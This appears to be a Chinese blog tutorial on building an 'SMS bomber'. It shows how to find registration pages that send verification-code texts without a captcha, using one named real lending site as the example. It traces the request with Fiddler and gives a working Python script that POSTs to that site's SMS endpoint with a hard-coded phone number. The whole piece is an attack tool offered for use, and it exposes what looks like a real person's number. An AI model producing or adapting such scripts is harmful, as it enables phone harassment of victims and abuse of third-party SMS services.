短信轟炸機(jī)的原理是利用一些用手機(jī)號(hào)注冊(cè)且需要發(fā)送驗(yàn)證碼的網(wǎng)站的漏洞，可以向任何人的手機(jī)號(hào)發(fā)送短信，當(dāng)然短信內(nèi)容，我們無法控制。所以主要工作還是尋找這樣的網(wǎng)站，然后利用Fiddler分析請(qǐng)求，使用post還是get,數(shù)據(jù)格式是怎么樣的等。

以微貸網(wǎng)為例，這個(gè)網(wǎng)站注冊(cè)的時(shí)候不需要驗(yàn)證碼就可以發(fā)送短信：

注冊(cè).JPG

點(diǎn)擊獲取驗(yàn)證碼后通過Fiddler分析請(qǐng)求：

2.JPG

我們可以發(fā)現(xiàn)，這個(gè)請(qǐng)求是POST請(qǐng)求。知道了這些之后就可以開始寫代碼。

import requests

agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
session = requests.session()
headers = {
    'Referer':"https://www.weidai.com.cn/regs/register.html",
    'User-Agent':agent
}

def login():
    url = 'https://www.weidai.com.cn/regs/mobileCode'
    # code = input()
    data = {
        'cate':0,
        'mobiles':'18668231697',
        'net4': 0.14528221177418043,
        'scode':0
    }
    ron = session.post(url, headers=headers, data=data)
    print(ron.status_code)

if __name__ == '__main__':
    login()